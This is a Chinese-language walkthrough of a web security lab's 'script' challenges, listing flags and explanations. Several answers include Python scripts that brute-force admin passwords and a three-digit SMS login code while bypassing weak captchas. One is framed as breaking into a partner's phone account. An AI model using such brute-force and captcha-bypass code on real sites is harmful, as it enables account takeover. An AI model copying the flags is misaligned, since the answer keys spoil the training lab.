网络安全实验室|网络信息安全攻防学习平台(脚本关)
1. 小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!
地址: http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php
正确答案: yougotit_script_now
答案解析:我们发现点击后又重定向了,在burpsuite的target里面我们看该目录的回应数据,可以发现key
如图:
2.快速口算:小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢?
地址: http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php
正确答案: 123iohHKHJ%^&*(jkh
答案解析:这种需要使用脚本来获取key,因为只有2秒,不可能人来操作。python代码如下:
- import requests
- import re
- from selenium import webdriver
- dirver=webdriver.Chrome()
- url="http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
- dirver.get(url)#使用Chrome打开地址
- res=dirver.page_source#读取页面代码
- print("页面代码:\n%s" %res)
- num=re.findall(r'[0-9+*()]+[)]',res)#获取计算式
- result=eval(num[0].strip())#计算结果
- print("计算结果:%s"%result)
- dirver.find_element_by_name( "v").send_keys(result)#搜索输入框输入result
- dirver.find_element_by_xpath( "html/body/form").submit()#点击提交按钮
- res=dirver.page_source#读取页面代码
- print("新页面代码:\n%s" %res)
3.这个题目是空的
Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)
正确答案: null
答案解析:为空,而且必须输入,当然是null啊!
4.怎么就是弹不出key呢?
提交说明:提交前14个字符即可过关
地址: http://lab1.xseclab.com/xss3_5dcdde90bbe55087eb3514405972b1a6/index.php
正确答案: slakfjteslkjsd
答案解析:查看源码,发现前面有一个a函数返回失败,去掉这些返回为false的函数,然后在稍微修改下:
- <html>
- <head>
- <meta http-equiv="content-type" content="text/html;charset=utf-8">
- <script>
- var a=function (){
- var b=function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1s(1e(p,a,c,k,e,r){e=1e(c){1d(c<a?\'\':e(1p(c/a)))+((c=c%a)>1q?1f.1j(c+1k):c.1n(1o))};1g(!\'\'.1h(/^/,1f)){1i(c--)r[e(c)]=k[c]||e(c);k=[1e(e){1d r[e]}];e=1e(){1d\'\\\\w+\'};c=1};1i(c--)1g(k[c])p=p.1h(1l 1m(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1d p}(\'Y(R(p,a,c,k,e,r){e=R(c){S(c<a?\\\'\\\':e(18(c/a)))+((c=c%a)>17?T.16(c+15):c.12(13))};U(!\\\'\\\'.V(/^/,T)){W(c--)r[e(c)]=k[c]||e(c);k=[R(e){S r[e]}];e=R(){S\\\'\\\\\\\\w+\\\'};c=1};W(c--)U(k[c])p=p.V(Z 11(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c]);S p}(\\\'G(B(p,a,c,k,e,r){e=B(c){A c.L(a)};E(!\\\\\\\'\\\\\\\'.C(/^/,F)){D(c--)r[e(c)]=k[c]||e(c);k=[B(e){A r[e]}];e=B(){A\\\\\\\'\\\\\\\\\\\\\\\\w+\\\\\\\'};c=1};D(c--)E(k[c])p=p.C(I J(\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\'+e(c)+\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\',\\\\\\\'g\\\\\\\'),k[c]);A p}(\\\\\\\'t(h(p,a,c,k,e,r){e=o;n(!\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\'.m(/^/,o)){l(c--)r[c]=k[c]||c;k=[h(e){f r[e]}];e=h(){f\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\'};c=1};l(c--)n(k[c])p=p.m(q s(\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\',\\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\\'),k[c]);f p}(\\\\\\\\\\\\\\\'1 3="6";1 4="7";1 5="";8(1 2=0;2<9;2++){5+=3+4}\\\\\\\\\\\\\\\',j,j,\\\\\\\\\\\\\\\'|u|i|b|c|d|v|x|y|j\\\\\\\\\\\\\\\'.z(\\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\\'),0,{}))\\\\\\\',H,H,\\\\\\\'|||||||||||||||A||B||M||D|C|E|F||I||J|G|N|O||P|Q|K\\\\\\\'.K(\\\\\\\'|\\\\\\\'),0,{}))\\\',X,X,\\\'||||||||||||||||||||||||||||||||||||S|R|V|W|U|T|Y|13|Z|11|14|12|10|19|1a|1b|1c\\\'.14(\\\'|\\\'),0,{}))\',1t,1u,\'|||||||||||||||||||||||||||||||||||||||||||||||||||||1e|1d|1f|1g|1h|1i|1v|1s|1l||1m|1n|1o|1r|1k|1j|1q|1p|1w|1x|1y|1z\'.1r(\'|\'),0,{}))',62,98,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|fromCharCode|29|new|RegExp|toString|36|parseInt|35|split|eval|62|75|53|var|slakfj|teslkjsdflk|for'.split('|'),0,{});
- var d=eval(b);
- //alert("key is first 14 chars"+d);
- document.getElementById('show').innerHTML='key is :'+d.substr(0,14);
- }
- </script>
- </head>
- <body>
- <a href="javascript:a();">_点击之后怎么没反应呢?说好的弹窗呢?__</a>
- <p id="show"></p>
- </body>
- </html>
5.逗比验证码第一期:逗比的验证码,有没有难道不一样吗?
地址: http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php
正确答案: LJLJL789sdf#@sd
答案解析:这题想让我们暴力**,而人工来**的花至少2小时把,所以我用python来**,代码如下:
- import requests
- import re
- s=requests.Session()
- url="http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
- head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
- for num in range(1000,10000):
- data={'username':'admin','pwd':num,'vcode':'GNZX','submit':'submit'}
- res=s.post(url,data=data,headers=head).content.decode('utf-8')
- if u'pwd error' in res:
- print('正在尝试',num,'------密码错误!')
- if u'vcode error' in res:
- print('验证码错误!')
- break
- if u'error' not in res:
- print(num,'----密码**成功!')
- print(res)
- break
6.逗比的验证码第二期:验证便失效的验证码
地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php
正确答案: LJLJL789ss33fasvxcvsdf#@sd
答案解析:将验证码改为空即可
- import requests
- import re
- s=requests.Session()
- url="http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"
- head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
- for num in range(1000,10000):
- data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}
- res=s.post(url,data=data,headers=head).content.decode('utf-8')
- if u'pwd error' in res:
- print('正在尝试',num,'------密码错误!')
- if u'vcode error' in res:
- print('验证码错误!')
- break
- if u'error' not in res:
- print(num,'----密码**成功!')
- print(res)
- break
7.逗比的验证码第三期:验证便失效的验证码
地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php
正确答案: LJLJLfuckvcodesdf#@sd
答案解析:将验证码去除,cookie改为session即可
- import requests
- import re
- s=requests.Session()
- url="http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"
- head={'session':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
- for num in range(1000,10000):
- data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}
- res=s.post(url,data=data,headers=head).content.decode('utf-8')
- if u'pwd error' in res:
- print('正在尝试',num,'------密码错误!')
- if u'vcode error' in res:
- print('验证码错误!')
- break
- if u'error' not in res:
- print(num,'----密码**成功!')
- print(res)
- break
8.微笑一下就能通过拉!尼玛,碰到这样的题我能笑得出来嘛...
地址: http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php
正确答案: hkjasfhsa*&IUHKUH
答案解析:查看源代码我们可以发现一个超链接,打开这个超链接是PHP代码,观察后发现from是POST提交,PHP处理是GET,呵呵(●'?'●) 微笑
在后缀里面加?^.^=data:,(●'?'●) 即可
9. 逗比的手机验证码:你的手机号码是13388886666,验证码将会以弹窗的形式给出
地址: http://lab1.xseclab.com/vcode5_mobi_5773f3def9f77f439e058894cefc42a8/
正确答案: [email protected]@sd
答案解析:傻吊题啊,获取验证码登陆提示13388886667登陆,重新来就是
10.基情燃烧的岁月:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:13388886666
地址: http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/
正确答案: 13399999999
答案解析:用python来**验证码:
- import requests
- import re
- s=requests.Session()
- url="http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"
- head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
- for num in range(100,1000):
- data={'username':'13388886666','vcode':num,'Login':'submit'}
- res=s.post(url,data=data,headers=head).content.decode('utf-8')
- if u'vcode or username error' in res:
- print('正在尝试',num,'------验证码错误!')
- if u'error' not in res:
- print(num,'----验证码**成功!')
- print(res)
- break
但是不知道为什么答案还是错的!
11.验证码识别 Tips:验证码依然是3位数
地址: http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php
正确答案:
答案解析:暂时没弄出来
12.XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧<子系统>
地址: http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php
正确答案:
答案解析:暂时没弄出来